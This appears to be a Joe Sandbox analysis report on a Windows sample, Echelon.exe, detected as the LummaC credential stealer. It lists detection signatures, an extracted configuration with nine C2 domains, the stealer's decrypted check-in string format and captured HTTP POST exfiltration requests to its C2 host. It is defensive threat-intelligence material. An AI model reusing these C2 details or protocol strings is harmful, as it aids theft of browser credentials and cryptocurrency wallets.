Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Echelon.exe

Overview

General Information

Sample name:Echelon.exe
Analysis ID:1579580
MD5:cbdef49d32cf66bfa4c8a86d225b11bd
SHA1:bc2ce52834c6a615a8bd5d3b6aafd25239d03b44
SHA256:4e6c7876342928a4ca103e27e2a0823c0e8df2457ba32e5d62fcf94cb111a477
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Echelon.exe (PID: 3356 cmdline: "C:\Users\user\Desktop\Echelon.exe" MD5: CBDEF49D32CF66BFA4C8A86D225B11BD)
  • cleanup
{"C2 url": ["dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "erectystickj.click"], "Build id": "yau6Na--1816906785"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4acdd:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x4e273:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Process Memory Space: Echelon.exe PID: 3356JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Echelon.exe PID: 3356JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T02:29:11.940959+010020283713Unknown Traffic192.168.2.549707172.67.154.166443TCP
              2024-12-23T02:29:13.994762+010020283713Unknown Traffic192.168.2.549708172.67.154.166443TCP
              2024-12-23T02:29:16.322446+010020283713Unknown Traffic192.168.2.549709172.67.154.166443TCP
              2024-12-23T02:29:18.572983+010020283713Unknown Traffic192.168.2.549712172.67.154.166443TCP
              2024-12-23T02:29:21.593774+010020283713Unknown Traffic192.168.2.549716172.67.154.166443TCP
              2024-12-23T02:29:24.823919+010020283713Unknown Traffic192.168.2.549723172.67.154.166443TCP
              2024-12-23T02:29:27.744190+010020283713Unknown Traffic192.168.2.549733172.67.154.166443TCP
              2024-12-23T02:29:30.348810+010020283713Unknown Traffic192.168.2.549740172.67.154.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T02:29:12.685320+010020546531A Network Trojan was detected192.168.2.549707172.67.154.166443TCP
              2024-12-23T02:29:14.749911+010020546531A Network Trojan was detected192.168.2.549708172.67.154.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T02:29:12.685320+010020498361A Network Trojan was detected192.168.2.549707172.67.154.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T02:29:14.749911+010020498121A Network Trojan was detected192.168.2.549708172.67.154.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T02:29:25.618042+010020480941Malware Command and Control Activity Detected192.168.2.549723172.67.154.166443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Echelon.exe.3356.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "erectystickj.click"], "Build id": "yau6Na--1816906785"}
              Source: Echelon.exeVirustotal: Detection: 58%Perma Link
              Source: Echelon.exeReversingLabs: Detection: 50%
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: impend-differ.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: print-vexer.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: dare-curbys.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: covery-mover.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: formy-spill.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: se-blurry.biz
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: erectystickj.click
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: yau6Na--1816906785
              Source: Echelon.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: Echelon.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: I:\lokibit\cpp\VSEncryptor\Win32\Release\VSEncryptor.pdb source: Echelon.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49723 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.154.166:443
              Source: Malware configuration extractorURLs: dwell-exclaim.biz
              Source: Malware configuration extractorURLs: print-vexer.biz
              Source: Malware configuration extractorURLs: covery-mover.biz
              Source: Malware configuration extractorURLs: formy-spill.biz
              Source: Malware configuration extractorURLs: impend-differ.biz
              Source: Malware configuration extractorURLs: se-blurry.biz
              Source: Malware configuration extractorURLs: zinc-sneark.biz
              Source: Malware configuration extractorURLs: dare-curbys.biz
              Source: Malware configuration extractorURLs: erectystickj.click
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49740 -> 172.67.154.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 172.67.154.166:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=68TR9TI6M5OBMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=17ILINSQ6U41R2EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4OZW1KMF1ZDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20530Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FIS1F4GASLGQZWSMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1252Host: erectystickj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9ZAVLE8JOVKMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570028Host: erectystickj.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: erectystickj.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: erectystickj.click
              Source: Echelon.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Echelon.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Echelon.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Echelon.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: Echelon.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0#
              Source: Echelon.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.0000000001648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Echelon.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Echelon.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Echelon.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Echelon.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: Echelon.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: Echelon.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: Echelon.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: Echelon.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
              Source: Echelon.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Echelon.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: Echelon.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
              Source: Echelon.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: Echelon.exeString found in binary or memory: http://www.lokibit.com
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276635790.000000000166E000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click/
              Source: Echelon.exe, 00000000.00000002.2322552088.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165457018.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2293376252.000000000450A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click/api
              Source: Echelon.exe, 00000000.00000003.2241658270.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241853994.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241744012.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2244207712.000000000450A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click/api3K
              Source: Echelon.exe, 00000000.00000002.2322552088.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276225371.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2280744837.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2293376252.000000000450A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click/apiZK
              Source: Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click/j
              Source: Echelon.exe, 00000000.00000003.2294045335.000000000165F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erectystickj.click:443/api
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Echelon.exeString found in binary or memory: https://www.globalsign.com/repository/0
              Source: Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Echelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.5:49733 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Echelon.exeStatic PE information: invalid certificate
              Source: Echelon.exe, 00000000.00000002.2320963707.0000000000E94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
              Source: Echelon.exe, 00000000.00000003.2118073064.0000000003DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
              Source: Echelon.exeBinary or memory string: OriginalFilenameVSEncryptor.exe8 vs Echelon.exe
              Source: Echelon.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.2321958723.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: Echelon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Echelon.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Echelon.exe, 00000000.00000003.2189014684.0000000004489000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166287699.00000000044A5000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166558918.0000000004488000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Echelon.exeVirustotal: Detection: 58%
              Source: Echelon.exeReversingLabs: Detection: 50%
              Source: Echelon.exeString found in binary or memory: </LAUNCH_ICON>
              Source: Echelon.exeString found in binary or memory: </LAUNCH_BTN>
              Source: C:\Users\user\Desktop\Echelon.exeFile read: C:\Users\user\Desktop\Echelon.exeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeSection loaded: msimg32.dllJump to behavior
